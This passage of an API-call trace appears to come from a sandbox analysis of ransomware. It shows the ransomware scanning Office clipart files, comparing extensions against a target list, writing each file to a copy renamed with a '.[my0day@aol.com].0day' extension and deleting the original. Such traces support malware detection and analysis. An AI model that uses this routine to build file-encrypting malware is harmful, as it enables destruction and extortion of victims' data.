(lpString=".docx") returned 5 [0271.971] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.971] lstrlenW (lpString=".pdf") returned 4 [0271.971] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.971] lstrlenW (lpString=".xls") returned 4 [0271.971] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.971] lstrlenW (lpString=".xlsx") returned 5 [0271.972] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.972] lstrlenW (lpString=".ppt") returned 4 [0271.972] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63 [0271.972] lstrlenW (lpString=".zip") returned 4 [0271.972] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.972] lstrlenW (lpString=".rar") returned 4 [0271.972] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.972] lstrlenW (lpString=".bz2") returned 4 [0271.972] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.972] lstrlenW (lpString=".7z") returned 3 [0271.972] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63 [0271.972] lstrlenW (lpString=".dbf") returned 4 [0271.972] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63 [0271.972] lstrlenW (lpString=".1cd") returned 4 [0271.972] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63 [0271.972] lstrlenW (lpString=".jpg") returned 4 [0271.972] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.972] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.972] lstrlenW (lpString="BS01638_.WMF") returned 12 [0271.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.973] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=10538) returned 1 [0271.973] CloseHandle (hObject=0x394) returned 1 [0271.973] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf")) returned 0x20 [0271.973] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.973] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.973] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.974] GetLastError () returned 0x0 [0271.974] ReadFile (in: hFile=0x394, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x292a, lpOverlapped=0x0) returned 1 [0272.004] WriteFile (in: hFile=0x388, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x2930, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x2930, lpOverlapped=0x0) returned 1 [0272.005] ReadFile (in: hFile=0x394, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0272.005] WriteFile (in: hFile=0x388, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.006] SetEndOfFile (hFile=0x388) returned 1 [0272.006] CloseHandle (hObject=0x388) returned 1 [0272.006] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.006] SetEndOfFile (hFile=0x394) returned 1 [0272.021] CloseHandle (hObject=0x394) returned 1 [0272.021] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.050] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf")) returned 1 [0272.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0272.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0272.050] lstrlenW (lpString=".doc") returned 4 [0272.050] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.050] lstrlenW (lpString=".docx") returned 5 [0272.050] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.050] lstrlenW (lpString=".pdf") returned 4 [0272.050] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.050] lstrlenW (lpString=".xls") returned 4 [0272.050] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.050] lstrlenW (lpString=".xlsx") returned 5 [0272.050] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.050] lstrlenW (lpString=".ppt") returned 4 [0272.050] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0272.050] lstrlenW (lpString=".zip") returned 4 [0272.051] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.051] lstrlenW (lpString=".rar") returned 4 [0272.051] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.051] lstrlenW (lpString=".bz2") returned 4 [0272.051] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.051] lstrlenW (lpString=".7z") returned 3 [0272.051] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0272.051] lstrlenW (lpString=".dbf") returned 4 [0272.051] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0272.051] lstrlenW (lpString=".1cd") returned 4 [0272.051] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0272.051] lstrlenW (lpString=".jpg") returned 4 [0272.051] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0272.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0272.051] lstrlenW (lpString=".doc") returned 4 [0272.051] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.051] lstrlenW (lpString=".docx") returned 5 [0272.051] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.051] lstrlenW (lpString=".pdf") returned 4 [0272.051] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.051] lstrlenW (lpString=".xls") returned 4 [0272.051] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.051] lstrlenW (lpString=".xlsx") returned 5 [0272.051] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.052] lstrlenW (lpString=".ppt") returned 4 [0272.052] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0272.052] lstrlenW (lpString=".zip") returned 4 [0272.052] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.052] lstrlenW (lpString=".rar") returned 4 [0272.052] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.052] lstrlenW (lpString=".bz2") returned 4 [0272.052] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.052] lstrlenW (lpString=".7z") returned 3 [0272.052] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0272.052] lstrlenW (lpString=".dbf") returned 4 [0272.052] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0272.052] lstrlenW (lpString=".1cd") returned 4 [0272.052] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0272.052] lstrlenW (lpString=".jpg") returned 4 [0272.052] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.052] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.052] lstrlenW (lpString="CLASSIC1.WMF") returned 12 [0272.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.061] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2422) returned 1 [0272.061] CloseHandle (hObject=0x394) returned 1 [0272.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf")) returned 0x20 [0272.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.128] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.128] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0272.128] GetLastError () returned 0x0 [0272.128] ReadFile (in: hFile=0x394, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x976, lpOverlapped=0x0) returned 1 [0272.135] WriteFile (in: hFile=0x318, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x980, lpOverlapped=0x0) returned 1 [0272.136] ReadFile (in: hFile=0x394, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0272.136] WriteFile (in: hFile=0x318, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.136] SetEndOfFile (hFile=0x318) returned 1 [0272.136] CloseHandle (hObject=0x318) returned 1 [0272.136] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.136] SetEndOfFile (hFile=0x394) returned 1 [0272.156] CloseHandle (hObject=0x394) returned 1 [0272.156] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.159] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf")) returned 1 [0272.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0272.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0272.305] lstrlenW (lpString=".doc") returned 4 [0272.305] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.305] lstrlenW (lpString=".docx") returned 5 [0272.305] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0272.305] lstrlenW (lpString=".pdf") returned 4 [0272.305] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.305] lstrlenW (lpString=".xls") returned 4 [0272.305] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.305] lstrlenW (lpString=".xlsx") returned 5 [0272.305] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0272.305] lstrlenW (lpString=".ppt") returned 4 [0272.305] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0272.305] lstrlenW (lpString=".zip") returned 4 [0272.305] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.305] lstrlenW (lpString=".rar") returned 4 [0272.305] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.305] lstrlenW (lpString=".bz2") returned 4 [0272.305] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.305] lstrlenW (lpString=".7z") returned 3 [0272.306] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0272.306] lstrlenW (lpString=".dbf") returned 4 [0272.306] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0272.306] lstrlenW (lpString=".1cd") returned 4 [0272.306] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0272.306] lstrlenW (lpString=".jpg") returned 4 [0272.306] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0272.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0272.306] lstrlenW (lpString=".doc") returned 4 [0272.306] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.306] lstrlenW (lpString=".docx") returned 5 [0272.306] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0272.306] lstrlenW (lpString=".pdf") returned 4 [0272.306] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.306] lstrlenW (lpString=".xls") returned 4 [0272.306] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.306] lstrlenW (lpString=".xlsx") returned 5 [0272.306] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0272.306] lstrlenW (lpString=".ppt") returned 4 [0272.306] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0272.306] lstrlenW (lpString=".zip") returned 4 [0272.306] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.306] lstrlenW (lpString=".rar") returned 4 [0272.306] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.307] lstrlenW (lpString=".bz2") returned 4 [0272.307] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.307] lstrlenW (lpString=".7z") returned 3 [0272.307] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0272.307] lstrlenW (lpString=".dbf") returned 4 [0272.307] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0272.307] lstrlenW (lpString=".1cd") returned 4 [0272.307] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0272.307] lstrlenW (lpString=".jpg") returned 4 [0272.307] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.307] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.307] lstrlenW (lpString="CUPINST.WMF") returned 11 [0272.307] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0272.462] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=10326) returned 1 [0272.463] CloseHandle (hObject=0x318) returned 1 [0272.463] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf")) returned 0x20 [0272.463] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.463] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0272.463] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.463] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.463] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0272.463] GetLastError () returned 0x0 [0272.463] ReadFile (in: hFile=0x318, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x2856, lpOverlapped=0x0) returned 1 [0272.492] WriteFile (in: hFile=0x380, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x2860, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x2860, lpOverlapped=0x0) returned 1 [0272.493] ReadFile (in: hFile=0x318, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0272.493] WriteFile (in: hFile=0x380, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xea, lpOverlapped=0x0) returned 1 [0272.493] SetEndOfFile (hFile=0x380) returned 1 [0272.493] CloseHandle (hObject=0x380) returned 1 [0272.493] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.493] SetEndOfFile (hFile=0x318) returned 1 [0272.496] CloseHandle (hObject=0x318) returned 1 [0272.496] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.496] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf")) returned 1 [0272.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0272.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0272.496] lstrlenW (lpString=".doc") returned 4 [0272.496] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.496] lstrlenW (lpString=".docx") returned 5 [0272.496] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0272.496] lstrlenW (lpString=".pdf") returned 4 [0272.496] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.496] lstrlenW (lpString=".xls") returned 4 [0272.496] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.496] lstrlenW (lpString=".xlsx") returned 5 [0272.496] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0272.496] lstrlenW (lpString=".ppt") returned 4 [0272.496] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0272.496] lstrlenW (lpString=".zip") returned 4 [0272.497] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.497] lstrlenW (lpString=".rar") returned 4 [0272.497] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.497] lstrlenW (lpString=".bz2") returned 4 [0272.497] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.497] lstrlenW (lpString=".7z") returned 3 [0272.497] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0272.497] lstrlenW (lpString=".dbf") returned 4 [0272.497] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0272.497] lstrlenW (lpString=".1cd") returned 4 [0272.497] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0272.497] lstrlenW (lpString=".jpg") returned 4 [0272.497] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0272.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0272.497] lstrlenW (lpString=".doc") returned 4 [0272.497] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.497] lstrlenW (lpString=".docx") returned 5 [0272.497] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0272.497] lstrlenW (lpString=".pdf") returned 4 [0272.497] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.497] lstrlenW (lpString=".xls") returned 4 [0272.497] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.497] lstrlenW (lpString=".xlsx") returned 5 [0272.497] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0272.497] lstrlenW (lpString=".ppt") returned 4 [0272.497] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0272.497] lstrlenW (lpString=".zip") returned 4 [0272.497] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.498] lstrlenW (lpString=".rar") returned 4 [0272.498] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 